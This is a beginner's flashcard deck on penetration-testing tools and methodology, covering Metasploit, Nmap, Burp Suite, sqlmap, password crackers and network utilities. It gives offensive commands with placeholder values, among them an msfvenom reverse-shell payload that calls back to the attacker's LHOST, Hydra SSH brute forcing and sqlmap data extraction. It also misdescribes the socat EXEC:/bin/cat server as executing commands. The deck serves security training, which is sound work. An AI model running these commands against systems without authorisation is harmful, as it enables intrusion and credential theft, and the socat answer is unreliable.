// Beginner Tools & Methodology Deck

What is the primary purpose of the Metasploit Framework in ethical hacking?
To provide a comprehensive platform for developing, testing, and executing exploit code against remote target machines in a controlled environment.

What is the basic command to start the Metasploit Framework console?
"msfconsole" which launches the interactive command-line interface for framework operations and module management.

What is the difference between exploits, payloads, and auxiliary modules in Metasploit?
Exploits take advantage of vulnerabilities, payloads execute after exploitation, and auxiliary modules perform additional tasks like scanning.

What is the primary purpose of the "search" command in Metasploit?
To find available modules matching specific criteria such as vulnerabilities, platforms, or module types.

What is the basic command to search for SMB exploits in Metasploit?
"search type:exploit platform:windows smb" which searches for SMB exploits targeting Windows platforms.

What is the difference between module categories in Metasploit (exploit, payload, auxiliary, post, encoder)?
Each category serves different purposes: exploits for access, payloads for actions, auxiliary for scanning, post for post-exploitation, encoders for obfuscation.

What is the primary purpose of the "use" command in Metasploit?
To select a specific module for configuration and execution, such as an exploit or auxiliary module.

What is the basic command to use a specific module in Metasploit?
"use [module_name]" which selects the specified module for configuration and execution.

What is the difference between global and module-specific options in Metasploit?
Global options affect the entire framework, while module-specific options apply only to the currently selected module.

What is the primary purpose of the "show options" command in Metasploit?
To display all configurable parameters for the currently selected module, including required and optional settings.

What is the basic command to set a target host in Metasploit?
"set RHOSTS [target_ip]" which configures the remote host address for the selected exploit module.

What is the difference between RHOSTS and LHOST in Metasploit?
RHOSTS specifies the target host to attack, while LHOST specifies the local host for reverse connections.

What is the primary purpose of the "setg" command in Metasploit?
To set global variables that apply to all modules, saving time when configuring multiple modules with common settings.

What is the basic command to set a global payload in Metasploit?
"setg PAYLOAD windows/meterpreter/reverse_tcp" which sets the default payload for all exploit modules.

What is the difference between "set" and "setg" commands in Metasploit?
"set" configures options for the current module only, while "setg" sets global options for all modules.

What is the primary purpose of the "check" command in Metasploit modules?
To test if the target is vulnerable to the selected exploit without actually exploiting it, providing safe vulnerability verification.

What is the basic command to check target vulnerability in Metasploit?
"check" which tests the target for vulnerability to the currently selected exploit module.

What is the difference between check and exploit commands in Metasploit?
Check verifies vulnerability without exploitation, while exploit actually attempts to gain access to the target.

What is the primary purpose of the "exploit" command in Metasploit?
To execute the currently selected exploit module against the configured target to gain access or achieve the module's purpose.

What is the basic command to run an exploit in Metasploit?
"exploit" or "run" which launches the currently selected exploit module against the target.

What is the difference between foreground and background exploitation in Metasploit?
Foreground runs in the current console session, while background runs as a job allowing continued use of the console.

What is the primary purpose of the "sessions" command in Metasploit?
To list, interact with, and manage established connections (shells) from successful exploits.

What is the basic command to list all active sessions in Metasploit?
"sessions" which displays all established connections from successful exploits with session IDs.

What is the difference between sessions and jobs in Metasploit?
Sessions are established connections to compromised systems, while jobs are background processes running exploits or modules.

What is the primary purpose of the "back" command in Metasploit?
To return to the previous context or main prompt when navigating through module configurations or sessions.

What is the basic command to interact with a specific session in Metasploit?
"sessions -i [session_id]" which connects to and allows interaction with a specific compromised system session.

What is the difference between bind and reverse payloads in Metasploit?
Bind payloads open a listener on the target, while reverse payloads connect back to the attacker's machine.

What is the primary purpose of the "payload" command in Metasploit?
To select and configure the payload that will execute after successful exploitation of the target system.

What is the basic command to set a reverse TCP payload in Metasploit?
"set PAYLOAD windows/meterpreter/reverse_tcp" which configures a reverse TCP Meterpreter payload.

What is the difference between staged and stageless payloads in Metasploit?
Staged payloads are delivered in multiple stages for smaller initial size, while stageless payloads are delivered all at once.

What is the primary purpose of Meterpreter in Metasploit?
To provide an advanced post-exploitation payload with extensive capabilities for system control and information gathering.

What is the basic command to upgrade a shell to Meterpreter in Metasploit?
"sessions -u [session_id]" which upgrades a basic shell to a Meterpreter session for enhanced capabilities.

What is the difference between Meterpreter and basic shell payloads?
Meterpreter provides advanced post-exploitation features, while basic shells offer limited command-line access.

What is the primary purpose of post-exploitation modules in Metasploit?
To perform additional actions after gaining initial access, such as privilege escalation, persistence, or information gathering.

What is the basic command to run a post-exploitation module in Metasploit?
"run [module_name]" or "post/[module_name]" which executes post-exploitation functionality on the target.

What is the difference between auxiliary and post-exploitation modules in Metasploit?
Auxiliary modules don't require exploitation, while post-exploitation modules run after successful system compromise.

What is the primary purpose of the "msfvenom" tool in Metasploit?
To generate custom payloads in various formats for different platforms and exploitation scenarios.

What is the basic command to generate a Windows executable payload with msfvenom?
"msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ip] LPORT=[port] -f exe > payload.exe"

What is the difference between msfvenom and msfconsole in Metasploit?
msfvenom generates standalone payloads, while msfconsole provides the interactive framework for exploitation.

What is the primary purpose of the "msfdb" tool in Metasploit?
To manage the Metasploit database for storing scan results, credentials, and exploitation data.

What is the basic command to initialize the Metasploit database?
"msfdb init" which creates and initializes the PostgreSQL database for Metasploit data storage.

What is the difference between using Metasploit with and without a database?
With a database, scan results and credentials are stored and searchable, while without a database, data is not persistent between sessions.

What is the primary purpose of Nmap in network reconnaissance?
To perform network discovery and security auditing through host discovery, port scanning, and service detection.

What is the basic command to perform a basic Nmap scan?
"nmap [target_ip]" which performs a TCP scan of the top 1000 most common ports on the specified target.

What is the difference between TCP and UDP scanning with Nmap?
TCP scanning establishes connections to test ports, while UDP scanning sends UDP packets and analyzes responses.

What is the primary purpose of the "-sS" flag in Nmap?
To perform a SYN scan (half-open scan) which is stealthier than a full TCP connect scan.

What is the basic command to perform service version detection with Nmap?
"nmap -sV [target_ip]" which attempts to determine the version of services running on open ports.

What is the difference between port scanning and service enumeration in Nmap?
Port scanning identifies open ports, while service enumeration identifies the specific software running on those ports.

What is the primary purpose of the "-O" flag in Nmap?
To perform operating system detection using TCP/IP stack fingerprinting techniques.

What is the basic command to perform OS detection with Nmap?
"nmap -O [target_ip]" which attempts to identify the target operating system through fingerprinting.

What is the difference between aggressive and normal Nmap scans?
Aggressive scans use additional techniques for more information but are more detectable, while normal scans are quieter but less detailed.

What is the primary purpose of Nmap Scripting Engine (NSE)?
To extend Nmap's capabilities with custom scripts for vulnerability detection, backdoor detection, and advanced reconnaissance.

What is the basic command to run default Nmap scripts?
"nmap -sC [target_ip]" which runs the default set of safe scripts to gather additional information.

What is the difference between safe and intrusive Nmap scripts?
Safe scripts won't crash services, while intrusive scripts might affect target systems or be more easily detected.

What is the primary purpose of the "burp suite" tool in web security testing?
To intercept, analyze, and modify web traffic between browser and web applications for comprehensive security testing.

What is the basic process to set up Burp Suite for testing?
Configure browser proxy to localhost:8080, enable intercept in Burp, and browse the application to capture traffic.

What is the difference between Burp Suite Community and Professional editions?
Community edition provides basic functionality for free, while Professional edition offers advanced features like automated scanning.

What is the primary purpose of the Burp Suite "Repeater" tool?
To manually modify and resend HTTP requests multiple times for testing different payloads and parameters.

What is the basic process to use Burp Repeater?
Send a request to Repeater, modify the request as needed, and send it to observe the response for vulnerability testing.

What is the difference between Repeater and Intruder in Burp Suite?
Repeater allows manual testing of individual requests, while Intruder automates attacks with multiple payloads.

What is the primary purpose of the Burp Suite "Intruder" tool?
To automate attacks against web applications using multiple payloads and attack positions.

What is the basic process to configure Burp Intruder?
Mark payload positions, select attack type, load payload list, and start the attack to test multiple variations.

What is the difference between sniper, battering ram, and pitchfork attacks in Burp Intruder?
Sniper uses one payload set across all positions, battering ram uses the same payload in all positions, pitchfork uses multiple payload sets simultaneously.

What is the primary purpose of the "sqlmap" tool in SQL injection testing?
To automate the detection and exploitation of SQL injection vulnerabilities including database fingerprinting and data extraction.

What is the basic command to test a URL for SQL injection with sqlmap?
"sqlmap -u [target_url] --dbs" which tests the URL for SQL injection and enumerates available databases.

What is the difference between error-based and blind SQL injection techniques?
Error-based injection uses database error messages to extract information, while blind injection requires inference techniques.

What is the primary purpose of the "--dbs" flag in sqlmap?
To enumerate all databases available on the target database server for further exploitation.

What is the basic command to extract tables from a specific database with sqlmap?
"sqlmap -u [target_url] -D [database_name] --tables" which extracts all tables from the specified database.

What is the difference between database enumeration and data extraction in sqlmap?
Enumeration discovers database structure, while data extraction retrieves the actual data from tables and columns.

What is the primary purpose of the "nikto" web vulnerability scanner?
To scan web servers for known vulnerabilities, dangerous files, outdated server versions, and configuration issues.

What is the basic command to scan a web server with Nikto?
"nikto -h [target_url]" which performs a comprehensive vulnerability scan of the specified web server.

What is the difference between Nikto and manual web security testing?
Nikto automates vulnerability detection using known signatures, while manual testing discovers unique vulnerabilities.

What is the primary purpose of the "OWASP ZAP" tool in web security?
To provide comprehensive web application security testing including automated scanning, manual testing, and fuzzing capabilities.

What is the basic command to start OWASP ZAP from command line?
"zap.sh" or "zap.bat" which launches the ZAP desktop application for web security testing.

What is the difference between passive and active scanning in OWASP ZAP?
Passive scanning analyzes traffic without sending additional requests, while active scanning sends attack payloads to identify vulnerabilities.

What is the primary purpose of the "spider" functionality in OWASP ZAP?
To automatically crawl web applications and discover all pages, forms, and functionality for security testing.

What is the basic process to use ZAP spider for application discovery?
Configure target URL, start spider, wait for completion, and analyze discovered pages and forms for testing.

What is the difference between spidering and manual application mapping?
Spidering automatically discovers application structure, while manual mapping relies on human exploration and testing.

What is the primary purpose of the "dirb" tool in web content discovery?
To perform directory and file brute forcing using wordlists to discover hidden web content.

What is the basic command to run dirb against a target?
"dirb [target_url]" which starts directory enumeration using default wordlists against the specified target.

What is the difference between dirb and gobuster in directory enumeration?
dirb is an older tool with basic functionality, while gobuster is faster with additional features like vhost enumeration.

What is the primary purpose of the "gobuster" tool in modern web testing?
To perform fast directory, file, and vhost enumeration using concurrent requests and advanced features.

What is the basic command to perform directory enumeration with gobuster?
"gobuster dir -u [target_url] -w [wordlist]" which enumerates directories using the specified wordlist.

What is the difference between directory enumeration and vhost enumeration with gobuster?
Directory enumeration discovers folders and files, while vhost enumeration discovers virtual hosts on the same IP.

What is the primary purpose of the "hydra" tool in password cracking?
To perform online password attacks against various protocols including SSH, FTP, HTTP, and SMB.

What is the basic command to brute force SSH with Hydra?
"hydra -l [username] -P [password_list] ssh://[target_ip]" which attempts SSH login using a password list.

What is the difference between online and offline password cracking?
Online cracking attacks live services with rate limiting, while offline cracking works on captured hash files without constraints.

What is the primary purpose of the "john" tool in offline password cracking?
To crack password hashes using dictionary attacks, rule-based attacks, and brute force methods.

What is the basic command to crack password hashes with John the Ripper?
"john --wordlist=[wordlist] [hash_file]" which attempts to crack hashes using a dictionary attack.

What is the difference between dictionary attacks and rule-based attacks in John?
Dictionary attacks use wordlists directly, while rule-based attacks apply transformations to dictionary words.

What is the primary purpose of the "hashcat" tool in GPU-accelerated password cracking?
To perform high-speed password cracking using GPU acceleration with support for various hash types and attack methods.

What is the basic command to perform a dictionary attack with Hashcat?
"hashcat -m [hash_type] -a 0 [hash_file] [wordlist]" which performs dictionary attacks against specified hash types.

What is the difference between CPU and GPU cracking with Hashcat?
GPU cracking provides massive parallel processing for speed, while CPU cracking uses general-purpose processors.

What is the primary purpose of the "cewl" tool in custom wordlist generation?
To generate custom wordlists from target websites by extracting unique words for more targeted password attacks.

What is the basic command to generate a wordlist with Cewl?
"cewl -d [depth] -m [min_length] -w [output_file] [target_url]" which extracts words and creates a wordlist.

What is the difference between generic wordlists and targeted wordlists?
Generic wordlists contain common passwords, while targeted wordlists use terms specific to the target for higher success rates.

What is the primary purpose of the "crunch" tool in custom wordlist generation?
To generate wordlists based on specific character sets and patterns for comprehensive password testing.

What is the basic command to generate a numeric wordlist with Crunch?
"crunch [min_length] [max_length] 0123456789 -o [output_file]" which generates all numeric combinations.

What is the difference between pattern-based and character-set-based wordlist generation?
Pattern-based generation follows specific formats, while character-set-based generation uses all combinations of specified characters.

What is the primary purpose of the "wireshark" tool in network analysis?
To capture and analyze network traffic for troubleshooting, security analysis, and protocol understanding.

What is the basic process to capture traffic with Wireshark?
Select network interface, start capture, filter traffic of interest, and analyze packets for security issues.

What is the difference between Wireshark and tcpdump in network analysis?
Wireshark provides graphical interface with advanced analysis, while tcpdump offers command-line packet capture.

What is the primary purpose of the "tcpdump" tool in command-line network analysis?
To capture and display network packets from the command line for security analysis and troubleshooting.

What is the basic command to capture HTTP traffic with tcpdump?
"tcpdump -i [interface] port 80" which captures all traffic on port 80 for HTTP analysis.

What is the difference between packet capture and protocol analysis in network security?
Packet capture records network traffic, while protocol analysis interprets the meaning and security implications of that traffic.

What is the primary purpose of the "netcat" tool in network testing?
To perform network connections, port scanning, and file transfer for basic network security testing.

What is the basic command to test port connectivity with netcat?
"nc -nv [target_ip] [port]" which tests connectivity to the specified port and displays service banners.

What is the difference between netcat and telnet in network testing?
netcat provides more flexible networking capabilities, while telnet is specifically for terminal connections.

What is the primary purpose of the "socat" tool in advanced network testing?
To provide advanced network connections with protocol translation, data manipulation, and complex networking scenarios.

What is the basic command to create a simple server with socat?
"socat TCP-LISTEN:8080,fork EXEC:/bin/cat" which creates a TCP server that executes commands.

What is the difference between socat and netcat in network capabilities?
socat provides advanced features like protocol translation and data manipulation, while netcat offers basic networking.

What is the primary purpose of the "python" programming language in ethical hacking?
To create custom security tools, automate tasks, and develop exploits with extensive library support.

What is the basic Python syntax for HTTP requests?
"import requests; response = requests.get('[url]')" which performs a basic HTTP GET request in Python.

What is the difference between Python and Bash in security scripting?
Python provides better structure and libraries, while Bash offers quick system command execution and pipeline processing.

What is the primary purpose of the "bash" scripting in ethical hacking?
To automate command-line tasks, combine multiple tools, and create custom security workflows.

What is the basic bash loop for host scanning?
"for ip in 192.168.1.{1..254}; do ping -c 1 $ip; done" which pings all hosts in a /24 network.

What is the difference between scripting languages and compiled languages in security tools?
Scripting languages offer rapid development and flexibility, while compiled languages provide better performance and obfuscation.

This beginner tools and methodology deck provides 100 questions covering essential ethical hacking tools, commands, and methodologies needed for effective security testing.
